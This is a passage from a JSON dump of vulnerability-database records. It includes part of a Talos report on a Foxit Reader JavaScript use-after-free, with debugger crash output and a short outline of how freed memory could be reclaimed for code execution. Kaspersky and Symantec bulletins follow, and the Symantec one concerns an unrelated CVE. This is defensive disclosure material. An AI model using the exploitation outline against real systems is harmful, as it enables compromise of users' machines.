FoxitReader!CFXJSE_Arguments::GetValue+0x002faf00\n 033b830f FoxitReader!CFXJSE_Arguments::GetValue+0x002f8a8f\n 033b812b FoxitReader!CFXJSE_Arguments::GetValue+0x002f88ab\n 030f5726 FoxitReader!CFXJSE_Arguments::GetValue+0x00035ea6\n 030f5207 FoxitReader!CFXJSE_Arguments::GetValue+0x00035987\n 030e2517 FoxitReader!CFXJSE_Arguments::GetValue+0x00022c97\n 030bda0f FoxitReader!FXJSE_Runtime_Release+0x00000c4f\n 030be224 FoxitReader!FXJSE_ExecuteScript+0x00000014\n 017b62e2 FoxitReader!CryptUIWizExport+0x00163602\n 017b70fd FoxitReader!CryptUIWizExport+0x0016441d\n 01414405 FoxitReader!std::basic_ios<char,std::char_traits<char> >::fill+0x0027fd25\n 01411a5b FoxitReader!std::basic_ios<char,std::char_traits<char> >::fill+0x0027d37b\n \n\nClearly, the same memory is now freed. Function `clearItems` is now done and the rest of event handler can be executed. Continuing the execution leads to the following crash:\n \n \n 0:000> bd 0\n 0:000> g\n (14b8.23fc): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n eax=00000000 ebx=00000000 ecx=1d786fd0 edx=00afe434 esi=00000000 edi=1d786fd0\n eip=0259636a esp=00afe450 ebp=00afe458 iopl=0 nv up ei pl zr na pe nc\n cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\n FoxitReader!safe_vsnprintf+0x13623a:\n 0259636a 3b771c cmp esi,dword ptr [edi+1Ch] ds:002b:1d786fec=????????\n 0:000> dd edi\n 1d786fd0 ???????? ???????? ???????? ????????\n 1d786fe0 ???????? ???????? ???????? ????????\n 1d786ff0 ???????? ???????? ???????? ????????\n 1d787000 ???????? ???????? ???????? ????????\n 1d787010 ???????? ???????? ???????? ????????\n 1d787020 ???????? ???????? ???????? ????????\n 1d787030 ???????? ???????? ???????? ????????\n 1d787040 ???????? ???????? ???????? ????????\n \n\nThis shows a crash while dereferencing the same chunk of memory (now pointed to by `edi`) that was previously freed. This constitutes a use-after-free condition.\n\nFrom observing Javascript execution, we can conclude that the use-after-free happens after memory is freed, but before the event handler invocation code is finished. This means that an attacker can place additional Javascript code after freeing the memory, giving them a chance to take control of it to be reused. In the crashing function, pointer in `edi` is actually `this` pointer which, with careful memory manipulation, can lead to further memory corruption and ultimately arbitrary code execution.\n\n### Timeline\n\n2020-10-19 - Vendor Disclosure \n \n2020-12-09 - Public Release\n\n##### Credit\n\nDiscovered by Aleksandar Nikolic of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2020-1175\n\nPrevious Report\n\nTALOS-2020-1181\n", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-12-24T15:29:16", "references": [{"idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_10_1_1.NASL", "FOXIT_PHANTOM_9_7_5.NASL"], "type": "nessus"}, {"idList": ["CVE-2020-13557"], "type": "cve"}, {"idList": ["KLA12028"], "type": "kaspersky"}], "rev": 2}, "score": {"modified": "2020-12-24T15:29:16", "rev": 2, "value": 6.5, "vector": "NONE"}}, "hash": "90b2a157c7156e311655cec7a44352e1ec97a819f77c4bfd543273170f0aa72e", "hashmap": [{"hash": "bf07efb879cf64d26dde9da417189e3d", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "416030bade20550bce5f04312004dd67", "key": "published"}, {"hash": "416030bade20550bce5f04312004dd67", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "1936743779d6188c65fb3c27a5a8f2b2", "key": "description"}, {"hash": "4cac367be6dd8242802053610be9dee6", "key": "cvss"}, {"hash": "342eab13384cd8721d57988a8abc4cd7", "key": "title"}, {"hash": "f2cee3fd74aadb43c91396f206bcf3e8", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "06740f628230eee658e65e5ebdcfa5d9", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "34956ac0a726126687502bf9088bc7bb", "key": "reporter"}], "history": [], "href": "http://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1171", "id": "TALOS-2020-1171", "immutableFields": [], "lastseen": "2020-12-24T15:29:16", "modified": "2020-12-09T00:00:00", "objectVersion": "1.5", "published": "2020-12-09T00:00:00", "references": [], "reporter": "Talos Intelligence", "title": "Foxit Reader JavaScript choice field use-after-free vulnerability", "type": "talos", "viewCount": 67}, "different_elements": ["cvss3", "cvss2"], "edition": 2, "lastseen": "2020-12-24T15:29:16"}], "edition": 3, "hashmap": [{"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "cvelist", "hash": "06740f628230eee658e65e5ebdcfa5d9"}, {"key": "cvss", "hash": "4cac367be6dd8242802053610be9dee6"}, {"key": "cvss2", "hash": "f0cab2ed51281c3cddb6cdf3ee00cdac"}, {"key": "cvss3", "hash": "b16d25a1771659bd4fe12a40d0f7c274"}, {"key": "description", "hash": "1936743779d6188c65fb3c27a5a8f2b2"}, {"key": "href", "hash": "bf07efb879cf64d26dde9da417189e3d"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "416030bade20550bce5f04312004dd67"}, {"key": "published", "hash": "416030bade20550bce5f04312004dd67"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "34956ac0a726126687502bf9088bc7bb"}, {"key": "title", "hash": "342eab13384cd8721d57988a8abc4cd7"}, {"key": "type", "hash": "f2cee3fd74aadb43c91396f206bcf3e8"}], "hash": "70828d03e6c65e9fb9ec14dcfed35052389b092e9e9e4d4c77b845fefda9e455", "viewCount": 67, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-13557"]}, {"type": "nessus", "idList": ["FOXIT_PHANTOM_9_7_5.NASL", "FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_10_1_1.NASL"]}, {"type": "kaspersky", "idList": ["KLA12028"]}], "modified": "2021-07-28T14:34:09", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2021-07-28T14:34:09", "rev": 2}}, "objectVersion": "1.6", "scheme": null, "immutableFields": [], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}}], "kaspersky": [{"id": "KLA12028", "hash": "8788ade86828caa43b993de05f25e63c", "type": "kaspersky", "bulletinFamily": "info", "title": "KLA12028 Multiple vulnerabilities in Foxit Reader and Foxit PhantomPDF", "description": "### *Detect date*:\n12/09/2020\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple vulnerabilities were found in Foxit Reader and Foxit PhantomPDF. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service.\n\n### *Affected products*:\nFoxit Reader earlier than 10.1.1.37576 \nFoxit PhantomPDF earlier than 10.1.1.37576\n\n### *Solution*:\nUpdate to the latest version \n[Download Foxit Reader](<https://www.foxitsoftware.com/downloads/#Foxit-Reader>)\n\n### *Original advisories*:\n[Foxit Security Bulletins](<https://www.foxitsoftware.com/support/security-bulletins.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Foxit Reader](<https://threats.kaspersky.com/en/product/Foxit-Reader/>)\n\n### *CVE-IDS*:\n[CVE-2020-13560](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560>)6.8High \n[CVE-2020-13570](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570>)6.8High \n[CVE-2020-13548](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548>)6.8High \n[CVE-2020-28203](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203>)4.3Warning \n[CVE-2020-13547](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547>)6.8High \n[CVE-2020-13557](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557>)6.8High \n[CVE-2020-27860](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860>)6.8High", "published": "2020-12-09T00:00:00", "modified": "2020-12-16T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA12028/", "reporter": "Kaspersky Lab", "references": ["https://www.foxitsoftware.com/downloads/#Foxit-Reader", "https://www.foxitsoftware.com/support/security-bulletins.html", "https://threats.kaspersky.com/en/product/Foxit-Reader/", "https://threats.kaspersky.com/en/product/Foxit-Phantom-PDF/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860", "https://statistics.securelist.com/vulnerability-scan/month"], "cvelist": ["CVE-2020-13547", "CVE-2020-13548", "CVE-2020-13557", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-27860", "CVE-2020-28203"], "immutableFields": [], "lastseen": "2021-08-18T10:59:16", "history": [{"bulletin": {"id": "KLA12028", "hash": "48d215e142feb4d5f19b845c0d33949aabf433474aa8afd7b637e5237ccc5023", "type": "kaspersky", "bulletinFamily": "info", "title": "\r KLA12028Multiple vulnerabilities in Foxit Reader and Foxit PhantomPDF ", "description": "### *Detect date*:\n12/09/2020\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple vulnerabilities were found in Foxit Reader and Foxit PhantomPDF. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service.\n\n### *Affected products*:\nFoxit Reader earlier than 10.1.1.37576 \nFoxit PhantomPDF earlier than 10.1.1.37576\n\n### *Solution*:\nUpdate to the latest version \n[Download Foxit Reader](<https://www.foxitsoftware.com/downloads/#Foxit-Reader>)\n\n### *Original advisories*:\n[Foxit Security Bulletins](<https://www.foxitsoftware.com/support/security-bulletins.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Foxit Reader](<https://threats.kaspersky.com/en/product/Foxit-Reader/>)\n\n### *CVE-IDS*:\n[CVE-2020-13560](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560>)0.0Unknown \n[CVE-2020-13570](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570>)0.0Unknown \n[CVE-2020-13548](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548>)0.0Unknown \n[CVE-2020-28203](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203>)0.0Unknown \n[CVE-2020-13547](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547>)0.0Unknown \n[CVE-2020-13557](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557>)0.0Unknown \n[CVE-2020-27860](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860>)0.0Unknown", "published": "2020-12-09T00:00:00", "modified": "2020-12-16T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA12028", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "immutableFields": [], "lastseen": "2020-12-22T03:22:30", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"modified": "2020-12-22T03:22:30", "references": [{"idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_10_1_1.NASL"], "type": "nessus"}, {"idList": ["TALOS-2020-1166", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1171", "TALOS-2020-1165"], "type": "talos"}, {"idList": ["ZDI-20-1415"], "type": "zdi"}, {"idList": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-13547", "CVE-2020-13557"], "type": "cve"}], "rev": 2}, "score": {"modified": "2020-12-22T03:22:30", "rev": 2, "value": 6.7, "vector": "NONE"}}, "objectVersion": "1.6"}, "lastseen": "2020-12-22T03:22:30", "differentElements": ["cvss", "cvss2", "cvss3"], "edition": 1}, {"bulletin": {"id": "KLA12028", "hash": "07e97504de40e9926eb065b8c4cb5ee8", "type": "kaspersky", "bulletinFamily": "info", "title": "\r KLA12028Multiple vulnerabilities in Foxit Reader and Foxit PhantomPDF ", "description": "### *Detect date*:\n12/09/2020\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple vulnerabilities were found in Foxit Reader and Foxit PhantomPDF. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service.\n\n### *Affected products*:\nFoxit Reader earlier than 10.1.1.37576 \nFoxit PhantomPDF earlier than 10.1.1.37576\n\n### *Solution*:\nUpdate to the latest version \n[Download Foxit Reader](<https://www.foxitsoftware.com/downloads/#Foxit-Reader>)\n\n### *Original advisories*:\n[Foxit Security Bulletins](<https://www.foxitsoftware.com/support/security-bulletins.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Foxit Reader](<https://threats.kaspersky.com/en/product/Foxit-Reader/>)\n\n### *CVE-IDS*:\n[CVE-2020-13560](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560>)0.0Unknown \n[CVE-2020-13570](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570>)0.0Unknown \n[CVE-2020-13548](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548>)0.0Unknown \n[CVE-2020-28203](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203>)0.0Unknown \n[CVE-2020-13547](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547>)0.0Unknown \n[CVE-2020-13557](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557>)0.0Unknown \n[CVE-2020-27860](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860>)0.0Unknown", "published": "2020-12-09T00:00:00", "modified": "2020-12-16T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA12028", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "immutableFields": [], "lastseen": "2020-12-25T01:35:54", "history": [], "viewCount": 41, "enchantments": {"dependencies": {"modified": "2020-12-25T01:35:54", "references": [{"idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_10_1_1.NASL", "FOXIT_PHANTOM_9_7_5.NASL"], "type": "nessus"}, {"idList": ["TALOS-2020-1166", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1171", "TALOS-2020-1165"], "type": "talos"}, {"idList": ["ZDI-20-1415"], "type": "zdi"}, {"idList": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "type": "cve"}], "rev": 2}, "score": {"modified": "2020-12-25T01:35:54", "rev": 2, "value": 6.7, "vector": "NONE"}}, "objectVersion": "1.6"}, "lastseen": "2020-12-25T01:35:54", "differentElements": ["cvss2", "cvss3"], "edition": 2}, {"bulletin": {"id": "KLA12028", "hash": "f02ba235b7daf1a0145192ea79fb8679975550b58bc13ab69b871cfd252a990b", "type": "kaspersky", "bulletinFamily": "info", "title": "\r KLA12028Multiple vulnerabilities in Foxit Reader and Foxit PhantomPDF ", "description": "### *Detect date*:\n12/09/2020\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple vulnerabilities were found in Foxit Reader and Foxit PhantomPDF. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service.\n\n### *Affected products*:\nFoxit Reader earlier than 10.1.1.37576 \nFoxit PhantomPDF earlier than 10.1.1.37576\n\n### *Solution*:\nUpdate to the latest version \n[Download Foxit Reader](<https://www.foxitsoftware.com/downloads/#Foxit-Reader>)\n\n### *Original advisories*:\n[Foxit Security Bulletins](<https://www.foxitsoftware.com/support/security-bulletins.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Foxit Reader](<https://threats.kaspersky.com/en/product/Foxit-Reader/>)\n\n### *CVE-IDS*:\n[CVE-2020-13560](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560>)0.0Unknown \n[CVE-2020-13570](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570>)0.0Unknown \n[CVE-2020-13548](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548>)0.0Unknown \n[CVE-2020-28203](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203>)0.0Unknown \n[CVE-2020-13547](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547>)0.0Unknown \n[CVE-2020-13557](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557>)0.0Unknown \n[CVE-2020-27860](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860>)0.0Unknown", "published": "2020-12-09T00:00:00", "modified": "2020-12-16T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA12028", "reporter": "Kaspersky Lab", "references": [], "cvelist": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "immutableFields": [], "lastseen": "2020-12-25T01:35:54", "history": [], "viewCount": 39, "enchantments": {"dependencies": {"modified": "2020-12-25T01:35:54", "references": [{"idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_10_1_1.NASL", "FOXIT_PHANTOM_9_7_5.NASL"], "type": "nessus"}, {"idList": ["TALOS-2020-1166", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1171", "TALOS-2020-1165"], "type": "talos"}, {"idList": ["ZDI-20-1415"], "type": "zdi"}, {"idList": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "type": "cve"}], "rev": 2}, "score": {"modified": "2020-12-25T01:35:54", "rev": 2, "value": 6.7, "vector": "NONE"}}, "objectVersion": "1.6"}, "lastseen": "2020-12-25T01:35:54", "differentElements": ["cvss2", "cvss3", "description", "href", "references", "title"], "edition": 3}], "viewCount": 43, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_10_1_1.NASL", "FOXIT_PHANTOM_9_7_5.NASL"]}, {"type": "cve", "idList": ["CVE-2020-13547", "CVE-2020-13560", "CVE-2020-13557", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-28203", "CVE-2020-27860"]}, {"type": "zdi", "idList": ["ZDI-20-1415"]}, {"type": "talos", "idList": ["TALOS-2020-1171", "TALOS-2020-1175", "TALOS-2020-1181", "TALOS-2020-1166", "TALOS-2020-1165"]}], "modified": "2021-08-18T10:59:16", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-08-18T10:59:16", "rev": 2}}, "objectVersion": "1.6", "_object_type": "robots.models.kaspersky.KasperskyBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.kaspersky.KasperskyBulletin"]}], "symantec": [{"id": "SMNTC-110814", "hash": "d42dc54c9a7e778462afcf7771a2433dd08c932ac5766c44fc5337eff402c7bb", "type": "symantec", "bulletinFamily": "software", "title": "Philips Tasy EMR CVE-2019-13557 Information Disclosure Vulnerability", "description": "### Description\n\nPhilips Tasy EMR is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain unauthorized access to sensitive information. This may lead to further attacks. Philips Tasy EMR version 3.02.1744 and prior are affected. Philips Tasy WebPortal version 3.02.1757 and prior are affected.\n\n### Technologies Affected\n\n * Philips Tasy EMR 3.02.1744 \n * Philips Tasy WebPortal 3.02.1757 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit. \n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to detect and block attacks and anomalous activity such as unexpected traffic. This may indicate exploit attempts.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "published": "2019-11-07T00:00:00", "modified": "2019-11-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/110814", "reporter": "Symantec Security Response", "references": ["http://www.usa.philips.com/"], "cvelist": ["CVE-2019-13557"], "lastseen": "2021-06-08T19:09:27", "history": [{"bulletin": {"_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "affectedSoftware": [{"name": "Philips Tasy EMR", "operator": "eq", "version": "3.02.1744"}, {"name": "Philips Tasy WebPortal", "operator": "eq", "version": "3.02.1757"}], "bulletinFamily": "software", "cvelist": ["CVE-2019-13557"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "### Description\n\nPhilips Tasy EMR is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain unauthorized access to sensitive information. This may lead to further attacks. Philips Tasy EMR version 3.02.1744 and prior are affected. Philips Tasy WebPortal version 3.02.1757 and prior are affected.\n\n### Technologies Affected\n\n * Philips Tasy EMR 3.02.1744 \n * Philips Tasy WebPortal 3.02.1757 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit. \n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to detect and block attacks and anomalous activity such as unexpected traffic. This may indicate exploit attempts.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-11-11T14:03:56", "references": [{"idList": ["ICSMA-19-120-01"], "type": "ics"}, {"idList": ["CVE-2019-13557"], "type": "cve"}], "rev": 2}, "score": {"modified": "2019-11-11T14:03:56", "rev": 2, "value": 4.9, "vector": "NONE"}}, "hash": "d83dc2b6e2157f724f88c7eea848fc46a59eac46276ff5418db10fc97499b8e3", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "26b3d243a446d61e36318d1323fe9e9a", "key": "href"}, {"hash": "dee2d346525c42556b1833b21cb142d8", "key": "_object_types"}, {"hash": "90df31fd67d47d3bd8365dd9519cab78", "key": "published"}, {"hash": "52e3bbafc627009ac13caff1200a0dbf", "key": "type"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "4bbc98d2616f9d5b9b52ad6ff27b34e7", "key": "affectedSoftware"}, {"hash": "be44dcaa074638a80b7dc2fd6459ca5a", "key": "title"}, {"hash": "38af5596de2fce76e4eb62aa066bbcdb", "key": "_object_type"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "5062ea5024d79bc24dc105d924d2b405", "key": "cvelist"}, {"hash": "dc40c8bc0970f7cf7a011c8fa0bac6f8", "key": "references"}, {"hash": "142740fe87d55fbb053eed6eb7386633", "key": "description"}, {"hash": "90df31fd67d47d3bd8365dd9519cab78", "key": "modified"}, {"hash": "d6218597dc7a1b025a781373296b2b63", "key": "reporter"}], "history": [], "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/110814", "id": "SMNTC-110814", "immutableFields": [], "lastseen": "2019-11-11T14:03:56", "modified": "2019-11-07T00:00:00", "objectVersion": "1.5", "published": "2019-11-07T00:00:00", "references": ["http://www.usa.philips.com/"], "reporter": "Symantec Security Response", "title": "Philips Tasy EMR CVE-2019-13557 Information Disclosure Vulnerability", "type": "symantec", "viewCount": 1}, "different_elements": ["affectedSoftware"], "edition": 1, "lastseen": "2019-11-11T14:03:56"}], "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-13557"]}, {"type": "ics", "idList": ["ICSMA-19-120-01"]}], "modified": "2021-06-08T19:09:27", "rev": 2}, "score": {"value": 4.9, "vector": "NONE", "modified": "2021-06-08T19:09:27", "rev": 2}}, "objectVersion": "1.5", "affectedSoftware": [{"name": "philips tasy emr", "operator": "eq", "version": "3.02.1744"}, {"name": "philips tasy webportal", "operator": "eq", "version": "3.02.1757"}], "_object_type": "robots.models.symantec.SymantecBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.symantec.SymantecBulletin"], "immutableFields": [], "edition": 2, "hashmap": [{"key": "_object_type", "hash": "38af5596de2fce76e4eb62aa066bbcdb"}, {"key": "_object_types", "hash": "dee2d346525c42556b1833b21cb142d8"}, {"key": "affectedSoftware", "hash": "e9d938fd65c9bcca7ea50577db99352b"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "5062ea5024d79bc24dc105d924d2b405"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "142740fe87d55fbb053eed6eb7386633"}, {"key": "href", "hash": "26b3d243a446d61e36318d1323fe9e9a"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "90df31fd67d47d3bd8365dd9519cab78"}, {"key": "published", "hash": "90df31fd67d47d3bd8365dd9519cab78"}, {"key": "references", "hash": "dc40c8bc0970f7cf7a011c8fa0bac6f8"}, {"key": "reporter", "hash": "d6218597dc7a1b025a781373296b2b63"}, {"key": "title", "hash": "be44dcaa074638a80b7dc2fd6459ca5a"}, {"key": "type", "hash": "52e3bbafc627009ac13caff1200a0dbf"}], "scheme": null}], "ics": [{"id": "ICSMA-19-120-01", 